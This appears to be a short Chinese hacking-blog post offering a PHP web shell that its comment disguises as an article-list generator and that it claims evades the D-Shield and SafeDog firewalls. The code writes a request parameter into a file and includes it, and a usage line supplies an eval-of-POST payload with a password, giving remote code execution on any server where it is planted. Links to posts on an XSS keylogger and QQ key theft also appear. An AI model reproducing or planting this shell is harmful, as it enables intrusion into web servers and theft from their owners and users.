完美过D盾,安全狗的php一句话
<?php /* * *文章列表生成文件 */ if(isset($_GET['list'])){ mud(); } function mud(){ $fp=fopen('content_batch_stye.html','w'); file_put_contents('content_batch_stye.html',"<?php\r\n"); file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND); fclose($fp); require 'content_batch_stye.html';} ?>
使用方法:http://www.oday.pw/oday.php?list=eval($_POST[oday]); // 密码 oday
测试结果:过安全狗D盾 36x 等
上一篇:XSS的键盘记录
下一篇:简单获取QQ key